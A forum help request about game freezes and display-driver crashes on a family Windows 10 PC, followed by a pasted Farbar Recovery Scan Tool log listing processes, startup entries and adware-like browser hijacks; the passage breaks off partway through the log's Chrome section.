
Crashes while playing minecraft, maybe rundll32.exe?



#1 Alban18


Posted 27 January 2016 - 06:22 PM

This is my uncle's computer and my little cousin is a daily computer user.
He told me that since a week or two ago, his games (Minecraft and Trove) would freeze after like 15-30 minutes of playing and a screen prompt would pop up telling him that the display driver has crashed and has been restored. Then he closes the prompt and closes his game since it doesn't unfreeze.
He contacted HP technical support a couple of days ago and the representative said that it was hacked and one of the problems is the rundll32.exe application.
The rep also sent him all the problems that he found remotely in a .txt file. But I will just list what he said here:
 
Here is the frst.txt file:
 
 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
Ran by sesay (ATTENTION: The user is not administrator) on BASEMENT-PC (27-01-2016 17:54:31)
Running from C:\Users\sesay\Desktop
Loaded Profiles: MuhammadAkim & sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
Failed to access process -> smss.exe
Failed to access process -> csrss.exe
Failed to access process -> wininit.exe
Failed to access process -> services.exe
Failed to access process -> lsass.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> vsserv.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> igfxCUIService.exe
Failed to access process -> dasHost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> OmniServ.exe
Failed to access process -> IntelCpHeciSvc.exe
Failed to access process -> spoolsv.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> AppleMobileDeviceService.exe
Failed to access process -> mDNSResponder.exe
Failed to access process -> SkypeC2CPNRSvc.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> BtwRSupportService.exe
Failed to access process -> updatesrv.exe
Failed to access process -> SkypeC2CAutoUpdateSvc.exe
Failed to access process -> wlanext.exe
Failed to access process -> conhost.exe
Failed to access process -> GamesAppIntegrationService.exe
Failed to access process -> HPSA_Service.exe
Failed to access process -> HPSupportSolutionsFrameworkService.exe
Failed to access process -> jhi_service.exe
Failed to access process -> LMS.exe
Failed to access process -> PresentationFontCache.exe
Failed to access process -> iPodService.exe
Failed to access process -> officeclicktorun.exe
Failed to access process -> SearchIndexer.exe
Failed to access process -> RtkAudioService64.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> dwm.exe
Failed to access process -> RAVBg64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
Failed to access process -> opvapp.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
Failed to access process -> SteamService.exe
Failed to access process -> fontdrvhost.exe
(Microsoft Corporation) C:\Windows\System32\msinfo32.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Oracle Corporation) C:\Program Files (x86)\Minecraft\runtime\jre-x64\1.8.0_25\bin\java.exe
(Oracle Corporation) C:\Program Files (x86)\Minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
Failed to access process -> svchost.exe
Failed to access process -> SearchProtocolHost.exe
Failed to access process -> SearchFilterHost.exe
 

==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8790264 2016-01-15] (Realtek Semiconductor)
HKLM\...\Run: [Bdagent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe [1603544 2015-11-11] (Bitdefender)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-17] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe [790880 2015-11-11] (Bitdefender)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [Gameo] => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [42482176 2015-07-04] ()
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [GoogleChromeAutoLaunch_F360403BC2EC98CA32D7EC0F47FB7B5E] => C:\Users\sesay\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-11] (The Chromium Authors)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [NowUSeeIt Player] => "C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe" /autostart=1
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [msnmsgr] => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\RunOnce: [Uninstall C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64"
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
Startup: C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2016-01-21]
ShortcutTarget: Curse.lnk -> C:\Users\sesay\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
Startup: C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2016-01-22]
ShortcutTarget: MEGAsync.lnk -> C:\Users\sesay\AppData\Local\MEGAsync\MEGAsync.exe (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{7a5d4b11-e3c0-473f-8cb1-6ef96b29487a}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ec741dab-2cfc-4a75-94f0-0a77b7af259e}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.live.com/1rewlive4startup/home
URLSearchHook: [S-1-5-21-1436452318-2580999886-2786755032-1001] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyB0FtCtD0CtA0B0CtGyBzzyD0CtG0EyDtBzytGtAzzzyyBtG0EyDtByDyEyCyE0FtCtC0B0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1057114629%26a%3Dwncy_omxmedia_15_51_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyB0FtCtD0CtA0B0CtGyBzzyD0CtG0EyDtBzytGtAzzzyyBtG0EyDtByDyEyCyE0FtCtC0B0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1057114629%26a%3Dwncy_omxmedia_15_51_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {6B023522-B37A-4323-9007-FF11E4F94C80} URL = hxxp://www.bing.com/search?FORM=WLETDF&PC=WLEM&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEzztN1L2XzutAtFtCyEtFtDtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyE0EzytAyEzzzz0AtGyD0A0CyEtGyByEyCtCtGyEyB0DyDtGzy0Ezz0DyByDyCtCzytB0Czz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1118004757%26a%3Dwny_omxmedia_15_51_ssg03%26os%3DWindows%2B10%2BHome&p={searchTerms}
BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2015\pmbxie.dll [2015-12-18] (Bitdefender)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-12-15] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_71\bin\ssv.dll [2016-01-21] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-21] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-21] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2015\Antispam32\pmbxie.dll [2015-12-18] (Bitdefender)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-12-17] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2015\pmbxie.dll [2015-12-18] (Bitdefender)
Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2015\Antispam32\pmbxie.dll [2015-12-18] (Bitdefender)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-08-22] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-21] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-21] (Oracle Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-08-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-05] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-05] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2014-11-14] ()
FF Plugin HKU\S-1-5-21-1436452318-2580999886-2786755032-1003: @citrixonline.com/appdetectorplugin -> C:\Users\sesay\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-01-27] (Citrix Online)
FF HKLM\...\Firefox\Extensions: [bdwteffv19@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff
FF Extension: Bitdefender Wallet - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff [2015-12-20]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext
FF Extension: Bitdefender Antispam Toolbar - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext [2015-08-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [firefox@bho.com] - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt
FF Extension: HP SimplePass - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt [2015-03-25] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv19@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext
 
Chrome:
=======
CHR HomePage: Default -> hxxp://www.search.ask.com/?o=APN10645A&gct=hp&d=406-679&v=n9092-93&t=4
CHR StartupUrls: Default -> "hxxp://www.search.ask.com/?o=APN10645A&gct=hp&d=406-679&v=n9092-93&t=4","hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_omxmedia_15_51_ssg03&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEzztN1L2XzutAtFtCyEtFtDtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyE0EzytAyEzzzz0AtGyD0A0CyEtGyByEyCtCtGyEyB0DyDtGzy0Ezz0DyByDyCtCzytB0Czz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1118004757%26a%3Dwny_omxmedia_15_51_ssg03%26os%3DWindows%2B10%2BHome"
CHR Profile: C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-08]
CHR Extension: (Google Docs) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-17]
CHR Extension: (Google Drive) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-17]
CHR Extension: (MEGA) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2016-01-26]
CHR Extension: (YouTube) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-17]
CHR Extension: (Google Search) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-17]
CHR Extension: (Bitdefender Wallet) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\fabcmochhfpldjekobfaaggijgohadih [2015-11-08]
CHR Extension: (Google Sheets) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-08]
CHR Extension: (Google Docs Offline) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-17]
CHR Extension: (Ask Search) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl [2016-01-22]
CHR Extension: (iLivid) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf [2016-01-22]
CHR Extension: (Chrome Web Store Payments) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-08]
CHR Extension: (Free Games Zone) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\oppjbdkgpfhhllancffaoaemplhkngoc [2016-01-22]
CHR Extension: (Gmail) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-17]
CHR Profile: C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-01-22]
CHR Extension: (Google Docs) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-22]
CHR Extension: (Google Drive) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-22]
CHR Extension: (YouTube) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-22]
